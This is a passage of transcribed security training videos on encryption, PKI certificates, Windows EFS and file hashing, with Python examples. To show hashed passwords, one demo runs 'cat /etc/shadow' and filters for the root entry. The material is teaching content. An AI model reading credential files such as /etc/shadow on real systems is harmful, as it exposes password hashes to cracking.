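    cipher = Fernet(key)               # the algorithm, initialized with the key
    ciphertext = cipher.encrypt(b"Hello World!")  # plain text in, ciphertext out
    print(ciphertext)
    print(cipher.decrypt(ciphertext))  # same key back in, plain text comes back out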
Cryptographic algorithms are also called ciphers. Essentially, they are mathematical formulas. Data and a key
are fed into the algorithm to result in the ciphertext. There are many IT solutions that allow the configuration
of specific ciphers that are to be used such as within a web browser or when configuring a VPN tunnel and so
on.
Stream ciphers encrypt message bits or bytes individually. And they're generally considered faster than their
counterpart block ciphers, which we'll talk about in a moment. However, stream ciphers don't provide
authenticity verification of a message. So examples of stream ciphers include RC4. This algorithm or stream
cipher is used with Wired Equivalent Privacy or WEP as well as Wi-Fi Protected Access – WPA.
However, it is considered vulnerable. So it shouldn't be used. Block ciphers encrypt blocks of data many bytes
together at once as opposed to bits or bytes individually like stream ciphers do. So, as a result, padding might
be required to ensure that blocks are always the same size. Examples of block ciphers include the Data Encryption Standard or DES, 3DES, Advanced Encryption Standard or AES, Blowfish, and Twofish.
With symmetric encryption and decryption, one key encrypts and decrypts. It is the same key. With
asymmetric encryption and decryption, we have mathematically related key pairs where the public key is used
to encrypt and the related private key can be used to decrypt a message. Keys have various attributes, such as length. And the shorter the key, the more susceptible it is to some kind of brute force attack.
Now a brute force attack attempts every possible key. If we look at DES, it has a 56-bit key length. And it has
been proven breakable. However, AES 256-bit on the other hand has not yet been proven breakable. Other
types of attacks include a known-plaintext attack where the attacker knows some or all of the original plain text before it resulted in ciphertext. Once that gets cracked and the attacker learns the key, they can then decrypt other messages.
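To make the key-length point concrete, here is a toy Python sketch – not a real cipher – that uses a single-byte XOR key. Because the key space is only 256 values, a brute-force attack that tries every key and checks the result against known plain text recovers it instantly; real keys like AES-256 make that approach infeasible.

    SECRET_KEY = 0x5A
    ciphertext = bytes(b ^ SECRET_KEY for b in b"Hello World!")  # toy "encryption"

    # Brute force: try every possible key and compare against the known plain text.
    for key in range(256):
        if bytes(b ^ key for b in ciphertext) == b"Hello World!":
            print("Key recovered:", hex(key))
            break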
[Topic title: Symmetric Cryptography. The presenter is Dan Lachance.] In this video, we'll talk about
symmetric cryptography. Symmetric cryptography uses a single private key, and this is often called a secret
key or a shared secret. This secret key is used to both encrypt and decrypt. So there aren't two keys, there is only one. But there is a lack of authentication, although a hashing algorithm can be used separately to verify data integrity.
Generally, symmetric cryptographic algorithms are considered to execute faster than asymmetric algorithms,
which use different yet related keys. Symmetric cryptography is used in many ways including with Wi-Fi
preshared keys such as those used with WPA and WPA2 wireless security. But symmetric cryptography can
also be used with file encryption or other standards such as IPsec.
Consider the example of a Wi-Fi router with clients that need to connect to the wireless network. So the
administrator then needs to configure a preshared key on the Wi-Fi router. Connecting devices then must know
and configure that same preshared key in order to connect and be authenticated with the access point. Here, in
the configuration of a wireless router, [The ASUS Wireless Router RT-N66U web page is open. It includes
several sections such as General, Advanced Settings, and System Status.] we can see over on the right the
name of the wireless network or the SSID. [The name of the wireless network or the SSID is linksys. It is
displayed under the System Status section.] But we can also see the Authentication Method, which in this case
is set to WPA2-Personal.
Now using WPA2-Personal or WPA-Personal requires the configuration of a key. Now the key that we configure must be known by connecting clients, so this is symmetric encryption. The difficulty with symmetric cryptography is how to safely distribute keys on a large scale, such as over the Internet. How do we get the key to everybody? All that a malicious user needs is the key. If they intercept a transmission containing the key, such as an e-mail message that itself is not encrypted, then they can decrypt all messages.
The other difficulty is that the sender and receiver must have the same key to communicate. And possession of
the key means that decryption is possible for all messages. Examples of symmetric algorithms include RC4,
DES, 3DES, Blowfish, and AES. In this video, we discussed symmetric cryptography.
[Topic title: Asymmetric Cryptography. The presenter is Dan Lachance.] In this video, I'll go over asymmetric
cryptography. Asymmetric cryptography uses two mathematically related keys – public key and the private
key. The public key is used for encryption, and the mathematically related private key decrypts. Asymmetric
cryptography also provides authentication, so we can be assured that a transmission or a message comes from
who it says it came from.
Data integrity is a part of asymmetric cryptography also, so we can detect if changes have been made to data.
However, it's generally considered slower than symmetric algorithms. With asymmetric cryptography, the
problem of distributing keys securely even on a large scale disappears. And that is a big problem with
symmetric cryptography since the same key is used for everything. The public key can be shared with everyone. Private keys, however, are not quite the same: they need to be kept secret by the owner.
Keys can also be exported from a PKI or Public Key Infrastructure certificate that's issued. Now, if we're going
to export a private key, then it needs to be stored in a password-protected file. For instance, here in Internet
Explorer, I'm going to open up my Tools menu and I'm going to go all the way down to Internet options at the
bottom. [The Internet Options dialog box opens.] Then I'll go to the Content tab where I can click the
Certificates button. [The Certificates dialog box opens.]
I'm going to go to the Personal tab here where I'm going to select a personal certificate that was issued to
myself. Now that could be issued by a Certificate Authority, or a CA, or in some cases, such as with Windows, the first time you encrypt a file using Encrypting File System – EFS – if you don't already have a user certificate, one will be created for you.
However the certificate came to be, when you select it here, you have the option of choosing Export down at the bottom. [He clicks the Export button and the Certificate Export Wizard opens.] When you go through the wizard, you have the option of exporting the private key. Now the public key is exported normally. And you
might export the public key from your certificate to give to another user so that they can encrypt, for example,
e-mail messages that they send to you because you will decrypt it with your private key.
Let's dive into the e-mail encryption example a bit further. Pictured here on the left, we have user Bob and on
the right we have user Alice. In this example, Bob wants to send an encrypted e-mail message to Alice. So
what happens is that Bob encrypts the message to Alice with Alice's public key. So one way or another, Bob
has to possess Alice's public key.
Now perhaps Alice exported it and provided it to Bob or perhaps Bob was able to read that from a centralized
address book, there are many ways to acquire public keys. And it's okay to share public keys with everybody.
That's why they are called public. So, again, Bob encrypts the message to Alice with her public key. Alice, on
the other hand, will decrypt the message with her related private key to which only she should have access.
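A minimal Python sketch of that Bob and Alice exchange, assuming the third-party cryptography package, looks like the following: the message is encrypted with the recipient's public key and can only be decrypted with the matching private key.

    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import rsa, padding

    # Alice's key pair; in practice these would come from her PKI certificate.
    alice_private = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    alice_public = alice_private.public_key()

    oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                        algorithm=hashes.SHA256(), label=None)

    # Bob encrypts with Alice's public key...
    ciphertext = alice_public.encrypt(b"Meet at noon", oaep)
    # ...and only Alice's private key can decrypt the result.
    print(alice_private.decrypt(ciphertext, oaep))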
These keys are stored in a PKI or X.509 certificate. And these certificates are issued by a Certificate Authority
or CA. Here the Certificate Authority could be within your company or it might be a third-party out on the
Internet. However, PKI certificates and by extension their keys eventually expire. Key pairs that are issued to
users or it could be issued to devices or applications are unique.
However, in some cases, they could be susceptible to a man-in-the-middle attack. Now, with the man-in-the-
middle attack, we've got an impersonation of an entity that's already communicating with another party. So
what could happen is that an impersonated public key could be provided to an unsuspecting sender.
So a public key, of course, is used to send encrypted data. And we could be fooling someone, if we are the malicious user in this example, into sending us sensitive information while the sender thinks it's going to someone else and is encrypted, and therefore protected. Examples of asymmetric cryptographic algorithms include RSA,
Diffie-Hellman, and ECC.
Objectives
[Topic title: Public Key Infrastructure. The presenter is Dan Lachance.] In this video, I'll discuss Public Key
Infrastructure. Public Key Infrastructure is often called PKI. It's a hierarchy of digital security certificates that
are also sometimes called X.509 certificates. These certificates are issued by a Certificate Authority, otherwise
called a CA. And they get issued to a user or a device or an application. Certificates, among other things, contain a unique public and private key pair that are used for things like encryption, decryption, and the creation and verification of digital signatures.
With the Public Key Infrastructure at the top of the hierarchy, you've got the Certificate Authority, or CA.
Under which, you could optionally have subordinate Certificate Authorities. So, for instance, in a large
organization, we might have a CA for the company, but we might have a subordinate Certificate Authority for
different parts of the world.
Now, under the subordinate Certificate Authority, we actually have issued PKI certificates for users, devices,
or applications. However, take note that the Certificate Authority itself could directly issue user, device, and
application PKI certificates. Now something that we have to be careful of is the Certificate Authority being
untrusted.
If this is a trusted third-party Internet CA such as Symantec, then most software such as web browsers
automatically trust that signer. However, if you build your own Certificate Authority within your company and
you issue PKI certificates – for example – to secure an intranet web server, your devices will not trust the
signature on that web server certificate. So therefore, there is a bit of extra configuration when you use an
internal Certificate Authority.
The other thing to consider is that the top-level or root CA should be taken offline and kept offline for security
purposes. Now what that means is that if the Certificate Authority were to be compromised, all certificates
underneath it – which is everything in the hierarchy – would also be considered compromised.
So root-level or top-level CAs should be taken offline. Certificates themselves have an expiry date. This is set
by the issuing CA. And it can differ. It might be one year, might be five years, could be eight years. Either
way, upon expiration, the certificate can't be used any longer. So, before expiration, the certificate can be
renewed. So it doesn't have to be completely reissued.
A compromised PKI certificate can be revoked. So therefore, the certificate can no longer be used. Inside a
digital PKI certificate, we have many things including the digital signature of the signing Certificate Authority
that issued the certificate. There's also the subject identity where for a user it might be their e-mail address or
for a web site it might be the URL to that site.
There is also an expiration date within a PKI certificate as well as, of course, a unique public and private key
pair. Additionally, you'll have key usage information that defines how keys within the certificate are to be
used. There might also be the location of a certificate revocation list or CRL. This is usually in the form of a
URL. In other words, it's a site where we can pull down a list of serial numbers for revoked PKI certificates
that are not to be trusted.
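If you want to see those certificate fields programmatically, a short Python sketch using the third-party cryptography package can load a certificate and print its subject, issuer, expiry, and serial number. Both the package choice and the filename server.pem are assumptions for illustration.

    from cryptography import x509

    # server.pem is a hypothetical PEM-encoded certificate file.
    with open("server.pem", "rb") as f:
        cert = x509.load_pem_x509_certificate(f.read())

    print(cert.subject)          # subject identity, such as the site's name
    print(cert.issuer)           # the signing Certificate Authority
    print(cert.not_valid_after)  # expiration date
    print(cert.serial_number)    # the serial number a CRL would list if revoked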
Third-party certificates are often trusted on the Internet. However, self-certified certificates are not trusted.
And that's back to our example of having your own CA within your company. So devices and applications then
would have to be configured to trust that self-certified CA. Certificates can also be issued through something
called auto-enrollment. And this is often used in a closed or corporate enterprise type of environment.
For example, in a Microsoft Active Directory network, we can use Group Policy to configure auto-enrollment
once devices refresh Group Policy. This way we have a centralized and trusted way to issue certificates on a
larger enterprise scale. Here, in my web browser, if I – in this case – go to the Tools menu because it's Internet
Explorer and all the way down to Internet options, [The Internet Options dialog box opens.] then go to the
Content tab, I can then click the Certificates button. [The Certificates dialog box opens. It includes the
Intermediate Certification Authorities and Trusted Root Certification Authorities tabs.]
Now interestingly, I can see Intermediate Certification Authorities whose signatures are trusted by this web
browser. [Some of these authorities are GlobalSign Root CA, AddTrust External CA, and COMODO RSA
Certificate.] I can also go to trusted roots – in other words, the top of the hierarchy. Here I have an
alphabetical list of trusted certificate root authorities that can issue certificates. [Some of these authorities are
AddTrust External CA Root, azuregateway-838c8, Baltimore CyberTrust Root, and Certum CA.] So, for
example, if we trust the Baltimore CyberTrust Root listed here in Internet Explorer, then by extension we trust
every certificate issued under that hierarchy.
Now, if you connect – for example – to a web site that is secured over HTTPS with an SSL or a TLS
certificate, your browser will be consulted to verify whether or not it should trust the signature. And, if it doesn't, it will pop up with a message that tells the user that they probably should not proceed to that site because the certificate is not considered to be valid. Notice here that we have Import and Export options. [He points to the Import and Export buttons in the Certificates dialog box.] So, for instance, we could import a trusted root certificate that we have created within our own environment. In this video, we discussed
Public Key Infrastructure.
Objectives
[Topic title: Request a PKI Certificate from a Windows CA. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to request a PKI certificate from a Windows Certificate Authority. A Certificate Authority, or
CA, is at the top of the PKI hierarchy, and its purpose is to issue PKI certificates. Or, if it doesn't do it directly,
then it will create subordinate CAs, which in turn can issue certificates. Either way, before you can configure a
certificate to be used for something like a web server as in our example, you have to know some details.
So, before we can request a PKI certificate to secure an HTTPS web server, we need to know the name of the
server. So here at the PowerShell command line, I'm going to ping the name of the server for which I want to
issue a PKI certificate. It's called srv2012-1, and the full name is srv2012-1.fakedomain.local.
So you need to know some of these details before you can request a PKI certificate. In the same way, if you're
requesting a user certificate maybe to digitally sign and encrypt e-mail, you would have to know some details –
things like the user e-mail address and so on. So we now know that we have a valid name that is responding on
the network.
So, at this point, let's go to the Start menu here on our server and type cert – c-e-r-t. We're going to start the
Certification Authority tool because this server already has a CA configured. Now, in the Certification
Authority tool [The certsrv window opens. The window is divided into two sections. The section on the left
contains the fakedomain-SRV2012-1-CA node, which further includes the Revoked Certificates and Certificate
Templates folders. The section on the right displays the content of the folder selected in the left section.] on the
left, I'm going to expand the name of my CA and I'm going to choose Certificate Templates. [The contents of
the Certificate Templates folder are displayed in the section on the right. It displays a list of templates and
their intended purposes.] Now we don't have a web server template here from which we can issue PKI
certificates.
So, to do that, I'm going to right-click on Certificate Templates on the left and choose Manage, which opens up
a new tool called the Certificate Templates Console. [This window is divided into three sections. The section in
the left contains the Certificate Templates node, which is selected by default. A list of generic templates is
displayed in the middle section. The section on the right is titled Actions.] Now, in this list, we've got a bunch
of generic templates, one of which in the Ws is called Web Server. So I want to right-click on that one and
choose Duplicate Template. [The Properties of New Template dialog box opens. It includes the General,
Subject Name, Cryptography, and Security tabs. At the bottom of the dialog box are several buttons such as
OK and Cancel.]
And, under the General tab, I'm going to give this a new name. It's going to be called Custom Web Server
Template. [He enters this name in the Template display name text box.] Now this is going to be the generated
PKI certificate of course. Down below, there are many other things that I can configure such as the Validity
period of the certificate. Here it's set to 2 years, which is fine. Under Subject Name here – in this case, the
name of the server that will receive the certificate – it's set to Supply in the request.
So that means that when we request the certificate, we'll have to supply the name. There are many other things
we could do here. For instance, under Cryptography, I might set the Minimum key size because remember
when a PKI certificate gets issued, there is a mathematically related public and private key pair.
So I'm going to go into the Security tab where I'm going to click the Add button. [The Select Users,
Computers, Service Accounts, or Groups dialog box opens. It includes the Object Types and Check Names
buttons.] And, for Object types, [He clicks the Object Types button and the Object Types dialog box opens. It
includes the Computers checkbox.] I'll select Computers. I'll click OK. Then I'm going to type in the name of
the server that I want to be able to have privileges to request a certificate from these templates. So that server is
called srv2012-1. [He enters this name in the Enter the object names to select text box under the Select Users,
Computers, Service Accounts, or Groups dialog box] I'll check the name and OK it. And, having that name
selected here in the ACL for this template, I'm going to make sure I turn on Enroll under the Allow
column. [He selects the Allow checkbox for the Enroll permission under the Permissions for SRV2012-1
section of the Security tabbed page.]
So SRV2012-1 is allowed to Enroll and essentially ask for a certificate based on this template. I'll click OK.
And I'll Close the Certificate Templates Console. [He switches back to the certsrv window.] Now the thing is
our Custom Web Server Template isn't showing up on the right, and that's normal. What you need to do to
make it usable is you need to right-click on Certificate Templates on the left. You need to go to New -
Certificate Template to Issue and then choose it from this list. There it is – Custom Web Server Template. We
are good to go.
Now let's play the part of the server that will request a certificate based on that template, which usually would
be a different computer. But, in our example, we'll just use the same computer. It won't make a difference. So
we're going to go ahead and go to the Start menu and type mmc.exe to start the Microsoft Management
Console tool. [The Console1 window opens. It is divided into three sections. The section in the left contains the
Console Root folder. The section in the middle displays the content of the folder selected in the section on the
left. The section on the right is titled Actions.] Now what I'm going to do here is add the certificate snap-in, so
we can work with certificates on this computer.
To make that happen, I'm going to go to the File menu. I'm going to choose Add/Remove Snap-in. [The Add
or Remove Snap-ins dialog box opens. It includes two list boxes. The first list box displays a list of available
snap-ins. The second list box displays a list of selected snap-ins. There is an Add button in the middle of these
list boxes that adds the selected snap-in from the first list box to the second list box.] I'm going to choose
Certificates on the left. Then I'll click Add in the middle. [A wizard opens. The first page is titled Certificates
snap-in. It contains a section, which is titled This snap-in will always manage certificates for. This section
includes the Computer account radio button. At the bottom are three buttons: Back, Next, and Cancel.] And
I'll choose Computer account, Next. [The next page is titled Select Computer. It includes a section that is titled
This snap-in will always manage. It further includes the Local computer radio button.] I'll leave it on Local
computer. And I'll click Finish. Finally, I'll click OK [in the Add or Remove Snap-ins dialog box]. And now
you can see that we've got the Certificates tool available or added to MMC. [The Certificates (Local
Computer) node gets added under the Console Root folder in the left section of the Console1 window.] So we
can now work with certificates for this computer.
In the left-hand navigator, [The Certificates (Local Computer) node further includes folders such as Personal
and Enterprise Trust.] I'm going to expand Personal, then I'm going to click Certificates where on the right, I
will see any existing certificates issued to this host. [The content of the Certificates subfolder is displayed in
the middle section.] To request a new certificate in the left-hand navigator, I will right-click on Certificates
and choose All Tasks - Request New Certificate. On the Certificate Enrollment screen – which is a wizard – I'll
click Next and Next again. And here we can see we can choose our Custom Web Server Template, [He selects
the Custom Web Server Template checkbox in the Request Certificates page.] but it says more information is
required.
So I'm going to click on that link. [The Certificate Properties dialog box opens, which includes the Subject
tab. It further includes the Subject name and Alternative name sections. Both sections contain a Type drop-
down list box and a Value text box. There are two buttons, Add and Remove, adjacent to both these
sections.] Now, for the Common name, I'm going to type in the name of my server – srv2012-1, [He types this
in the Value text box under the Subject name section.] and I will click Add. And, for the Alternative name
down below, I'll choose DNS [He selects this value in the Type drop-down list box.] and I'll put in srv2012-
1.fakedomain.local. [He types this in the Value text box.] Now we pinged that at the onset of this demonstration
to make sure it was valid, and it was. I'll click Add. So essentially, this is going to be added into the PKI
certificate that gets issued for this server. So I'll click OK, and then I'll click the Enroll button. [This button is
present at the bottom of the Request Certificates page of the Certificate Enrollment wizard.]
And now it says the STATUS: Succeeded. So therefore I'll click Finish. I can see that I've got a certificate now
in this list that's been issued to this server from the template. [This certificate appears in the middle section of
the Console1 window.] I can see the Expiration Date. I can see the Intended Purposes. And actually, I could
even double-click on that certificate where I might even go into Details to see things like what's the subject
name. There is the subject name – the name of the server. If I go further down, I can even see things like the
Subject Alternative Name is the DNS name of the server of course and so on. So let's actually use that
certificate. And this host happens also to be a web server. We're going to do it on the same computer again.
In my Start menu, I'm going to type iis so that I can start the Internet Information Services (IIS) Manager tool
to manage web sites. It also actually lets me manage FTP sites. [The Internet Information (IIS) Manager
window opens. There is a section on the left, which is titled Connections. It includes the Start page node,
which further includes the SRV2012-1 (FAKEDOMAIN\Administrator) subnode. This subnode includes the
Sites folder, which further includes the Default Web Site option.] But we're worried about our Default Web
Site here and securing it with HTTPS. So you need a certificate for that. Well, we've got a certificate.
I'm going to right-click on the Default Web Site and choose Edit Bindings. [The Site Bindings dialog box
opens. It includes the Add and Edit buttons.] Here you can see our web server has a Port 80 binding, but not a
Port 443 binding, which is normally used for secured connections over HTTPS. So I'm going to click the Add
button. [The Add Site Binding dialog box opens. It includes the Type and IP address drop-down list boxes. It
also includes the Port and Host name text boxes.] And, from the Type drop-down list, I'll choose
https. [Another drop-down list box appears, which is titled SSL certificate.] Notice it's selected Port 443.
Now I have to choose an SSL certificate. So I'm going to go down and choose the one that we just issued here.
Here is the server's common name – srv2012-1. And I will click OK and Close. Now, if I start my web browser
– so I'm going to start Internet Explorer – and if I try to connect to https://srv2012-1, in this
case, .fakedomain.local/, the full DNS name, it takes us right to it. So now our server has an encrypted
connection through the certificate that we requested from the Windows Certificate Authority.
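As a quick cross-check outside the browser, a Python sketch using the standard ssl module can connect to the new HTTPS binding and print the certificate the server presents. Because our CA is internal, the default trust store won't recognize it, so the sketch assumes the root certificate has been exported to a file; that filename is hypothetical.

    import socket
    import ssl

    host = "srv2012-1.fakedomain.local"
    context = ssl.create_default_context()
    # Hypothetical exported copy of our internal root CA certificate.
    context.load_verify_locations("fakedomain-root-ca.pem")

    with socket.create_connection((host, 443)) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
            print(cert["subject"], cert["notAfter"])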
[Topic title: Use Windows EFS File Encryption. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to use Windows encrypting file system. Encrypting file system, or EFS, is built into the
Windows operating system. And it allows users to encrypt files and folders. So that user then must be
successfully authenticated before decryption can occur. So therefore, it's based on the user unlike BitLocker, which is really tied to the machine and protects data at rest – data while the machine is turned off and the disk volume is still encrypted.
So the first thing we should always do is get some kind of context. And what that means here is I'm going to
type whoami to see who I'm currently logged in as. [The presenter types this in the PowerShell window.] In
this case, I'm logged in as the administrator account in the domain called fakedomain. Now this is important
because any files that I encrypt will be encrypted with whoever I'm currently authenticated as. So now that we
know that information, let's go ahead and take a look at what we need to do to make EFS file encryption work.
I'm going to open up Windows Explorer where I'm going to take a look at a sample file on drive I. So let me
just go into the UserDataFiles folder - Projects. Now I could encrypt an entire folder, but here I'm just going to
choose a single file called Project_A. I'm going to right-click on that file and choose Properties. [The
Project_A Properties dialog box opens.] In the Properties, I'm going to go down under the Advanced
button [He clicks the Advanced button and the Advanced Attributes dialog box opens.] where I can see it's not
currently encrypted, because there is no checkmark for the option that says Encrypt contents to secure data.
Now interestingly from the command line, I could also use the cipher.exe tool. So I'll just put a /? after that to
work with EFS encryption here at the command line. [He executes the cipher.exe /? command in the
PowerShell window.] And that's definitely useful if you want to work with things in an automated fashion, if
you want to repeat actions on multiple machines. However, I'm going to Minimize that screen. We're going to
use the GUI here to encrypt this file with EFS. [He switches back to the Advanced Attributes dialog box and
selects the Encrypt contents to secure data checkbox.]
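For the automated scenario just mentioned, a hedged Python sketch could drive the built-in cipher.exe tool to EFS-encrypt a folder rather than working through the GUI. The target path below is hypothetical; cipher with the /E switch enables encryption on the named directory.

    import subprocess

    # Hypothetical target folder; cipher /E marks it so its contents are EFS-encrypted.
    target = r"I:\UserDataFiles\Projects"
    result = subprocess.run(["cipher", "/E", target],
                            capture_output=True, text=True)
    print(result.stdout)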
So really it's just a matter of going into the Properties, going into the Advanced button, and turning on this
checkmark to encrypt the contents. Now, when I click OK the second time, [He clicks the OK button in the
Project_A Properties dialog box and the Encryption Warning dialog box opens.] it asks if I would like to
Encrypt the file and its parent folder or just the file. Well, I'm going to choose Encrypt the file only, and then
I'll turn on the checkmark to always encrypt only the file. And I'll click OK. Now what this means is that any new
files placed into this folder will not be automatically encrypted. So that's fine.
I'm going to go ahead and OK out of that. And notice that the color of the file has changed because it's now
encrypted. Now, to the user that encrypted it, everything is completely transparent other than the color
changing. If I would open up that file by double-clicking, it just opens up as per usual, whereas anyone else is
going to get an access denied message.
Do take note though, that if you are working on a project – for example – and you want other people to be able
to decrypt that same file, it is possible. So, for instance, if I right-click on the file and go under Properties and
then go down under Advanced and then click on Details, [He clicks the Details button in the Advanced
Attributes dialog box and the User Access to Project_A dialog box opens.] from here I could click Add to add
other people that should be able to decrypt the same file. [He clicks the Add button and the Encrypting File
System dialog box opens.]
Now, in order for me to do that, I have to make sure I have access to their certificates. Now certificates –
what's that about? Well, in the background, what encrypting file system is doing is using a PKI certificate
issued to the user for encryption. Now either you can control that yourself, or if the user doesn't already have a PKI certificate the first time they encrypt a file, one will be auto-generated, which is what will have happened here.
Let's go take a look at that. So, to verify that this is true, I'm going to start the Microsoft Management Console
or MMC. And we're going to add the certificate snap-in and look at the user certificate. So, in my Start menu,
I'm going to type mmc.exe. There it is. So I'm going to click on it. [He opens the Console1 window.] And I'll
maximize it. And I'll go to File menu. I'll choose Add/Remove Snap-in. [The Add or Remove Snap-ins dialog
box opens. It includes two list boxes. The first list box displays a list of available snap-ins. The second list box
displays a list of selected snap-ins. There is an Add button in the middle of these list boxes that adds the
selected snap-in from the first list box to the second list box.] On the left, I'll choose Certificates. Then I'll
click Add. [The Certificates snap-in dialog box opens that contains a section named This snap-in will always
manage certificates for. This section includes the My user account radio button.] And I want it for the user
account. So I'll leave it on My user account, Finish, and OK.
Alright, finally, after all those steps in our console on the left, we can see certificates for the current user. So I
will expand that as well as expanding Personal. Then I'll click on Certificates on the left. [He selects the
Certificates subfolder in the left section of the Console1 window and its content is displayed in the middle
section.] Notice here, I've got a certificate issued to my user account, Administrator. Now, because I've got a
Certificate Authority installed, that was issued by my Certificate Authority in the Active Directory domain.
And notice that the Expiration Date is listed here. And notice, this is the key here, no pun intended – the
Intended Purposes for encrypting file system. So this certificate then is what is used to encrypt and decrypt
files based on this user account. So it's crucial that that be backed up.
Now the safety net in an Active Directory domain environment – should PKI certificates be corrupted or not backed up, or workstations destroyed – is that the domain administrator is, by default, an EFS recovery agent. And you can configure other accounts as recovery agents in Group Policy. And what that means then is that the EFS recovery agent can decrypt anyone's data if absolutely required. In this video, we learned how to use
Windows EFS file encryption.
[Topic title: Fingerprinting, Hashing. The presenter is Dan Lachance.] In this video, I'll talk about
fingerprinting and hashing. A hash is a short value that uniquely represents original data. Hashing uses one-
way functions that are not feasibly reversed without knowledge of the original data. Hashing is also an
efficient way of detecting modification, especially across the network between multiple nodes without having
to transmit all of the original data. Instead, hashes can be computed on different devices. And the hashes
themselves – which are much smaller potentially than the data they are based on – are what would be sent and
compared over the network.
Hashes are normally at least 128 bits long. And they are sometimes called message digests. We can compute a
hash of data and then compare that to an earlier hash of that data to detect if any changes have occurred. And
this is actually done quite often with forensic evidence gathering to ensure that prior to forensic experts
conducting analysis on seized information, we have a record of its original state.
Ways that hashing gets used include password hashing in the UNIX and Linux /etc/shadow file. Here, in
Linux, I'm going to type cat /etc/shadow. [The presenter executes this command in the root@kali command
prompt window.] In UNIX and Linux environments, the shadow file will have user account information along
with hashed passwords. Now I'm going to clear the screen and bring up that command again with the up arrow.
But I'm going to pipe it to grep, which is a line filter. And we're going to look for the root user account. [He
executes the cat /etc/shadow | grep root command.]
What you're going to notice is that in the second placeholder – the delimiter being a colon – we have a hashed version of the root password. Now you can't enter in the hash to authenticate as that user. That's not going to work. However, there is an algorithm that's used upon logon where the password is fed through a hashing algorithm. And, if it results in this unique hash, then the password is correct.
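Real /etc/shadow entries use salted schemes such as sha512-crypt, but the logon flow can be sketched in Python roughly like this: hash the supplied password with the stored salt and compare the result to the stored hash. The function below is a simplified stand-in, not the actual algorithm Linux uses.

    import hashlib
    import hmac
    import os

    def hash_password(password, salt):
        # Simplified stand-in for the salted scheme actually used in /etc/shadow.
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    salt = os.urandom(16)
    stored_hash = hash_password("S3cret!", salt)      # saved when the account is created

    attempt = hash_password("S3cret!", salt)          # recomputed at logon
    print(hmac.compare_digest(stored_hash, attempt))  # True only if the password matches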
Hashing is also often used for file integrity verification. We can also verify that downloaded Internet files
haven't been corrupted during download by doing a hash after we've downloaded it on our local machine and
comparing it to a hash published on a web site. For instance, the shasum command line tool can be used in
Mac OS X to ensure downloaded files have not been corrupted or tampered with. You'll learn how to perform
hashing in Linux and Windows in other demonstrations. Common hashing algorithms include MD5 – that's
message digest 5; RIPEMD; and the secure hashing algorithm family such as SHA1, SHA2, and SHA3. In this
video, we discussed fingerprinting and hashing.
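Before moving on, here is a hedged Python equivalent of that download check using the standard hashlib module: compute the file's SHA-256 and compare it to the value published on the vendor's web site. Both the filename and the published hash below are placeholders.

    import hashlib

    def sha256_of(path, chunk_size=65536):
        digest = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(chunk_size), b""):
                digest.update(chunk)
        return digest.hexdigest()

    published_hash = "replace-with-the-hash-published-on-the-vendor-site"
    if sha256_of("downloaded-installer.iso") == published_hash:
        print("Download is intact")
    else:
        print("Hash mismatch - the file was corrupted or tampered with")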
[Topic title: File Hashing in Linux. The presenter is Dan Lachance.]
In this video, I'll demonstrate how to perform file hashing in the Linux operating system. Hashing allows us to
run some kind of a computation on originating data to see if it's changed since the last time we ran that same
computation. Here, in Linux, I'm in my data directory where I'm going to type ls to list files. I can see I've got a
file here called log1.txt. So why don't we take a look at what's inside it using the cat command?
[The presenter executes the cat log1.txt command.]
So there's a single line of text that says, "This is sample data on line one." What I'm now going to do is use the
md5sum command, spacebar, then I'll put in the name of my file. And notice that I get the resultant hash.
[He executes the md5sum log1.txt command.]
Now what I could do is use output redirection to store this hashed information in a file. So, for instance, I'll use
the up arrow key to bring up that command. I'll use a greater than sign, which is my output redirection symbol.
And maybe in the current directory, I'm going to make a file called log1hash.
[Video description begins] He executes the md5sum log1.txt > log1hash command. [Video description ends]
Now, when I press Enter, I don't get the output on the screen anymore, but I do have a log1hash file. If I cat the
log1hash file to view the contents within it, then I'm going to see that I've got my hash information along with
the filename.
[Video description begins] He executes the cat log1hash command. [Video description ends]
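As a side note, rather than comparing hash values by eye, md5sum can also check a file against a previously saved hash list. Assuming the log1hash file was created as shown above, a command along these lines would report the file as OK or FAILED:
md5sum -c log1hash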
So let's go ahead then and make a change to the contents within log1.txt. To do that, I will use the vi text editor, so vi log1.txt. Now, in here, I'm going to go to the end of the line and press Insert. And I'm going to press Enter, where I'll type "This is line two." I'll then press Esc so that I'm no longer in INSERT mode. Now
I'm in command mode, so things I type in don't become part of the file, they're interpreted as commands in the
VI editor. So I'm going to type :wq. And you'll see that showed up in the bottom-left where w means write –
write the changes to the file – and q means quit. So now I'm going to use my up arrow key to go back to the md5sum command that was originally run against log1.txt. Let's go ahead and run it. Now notice that this time
[Video description begins] He again executes the md5sum log1.txt command. [Video description ends]
if you look carefully at the resultant hash, it begins with c2d2. That of course is different than the original hash,
which began with 53d4. So the point is this, hashing lets us detect when a change has occurred – in this case, to
a file in the Linux filesystem. In this video, we learned how to work with file hashing in Linux.
Objectives
[Topic title: File Hashing in Windows. The presenter is Dan Lachance.] In this video, I'll demonstrate how to
work with file hashing in the Windows environment. Now why would we ever want to hash a file? What is the
purpose? The purpose is to simply detect if a change has occurred since we last ran the computation that
resulted in the hash. Now, in the Windows world, we can use third-party command line and GUI tools or what
I'm going to demonstrate here is using PowerShell with the built-in Get-FileHash cmdlet. But first let's start by
typing dir.
Here we've got a working file called Project1.txt. So let's just use notepad to open that up to see what's inside
it. [The presenter executes the notepad .\Project1.txt command and the Project1.txt - Notepad window
opens.] It's got one line of text that says "This is line one." Okay, so that's what we've got to work with. Now
what I'm going to do is I'm going to use the Get-FileHash cmdlet – so get-filehash. Now, unlike Linux of
course, PowerShell is not case sensitive. And I'll give it the name of the file I want to run a hash of. That would
be Project1.txt. [He executes the get-filehash .\Project1.txt command.] And we can see the unique SHA256
hash value that's been returned.
Now, much like I can in other environments – like in Linux shells – I can redirect output of that command to a
file for future reference, which is exactly what I want to do. I'm going to use the up arrow key to bring up that
command. And, at the end, I'm going to use the greater than symbol because that will take the screen output
and capture it and dump it into a file instead, which I'm going to call project1hash. [He executes the get-
filehash .\Project1.txt > project1hash command.]
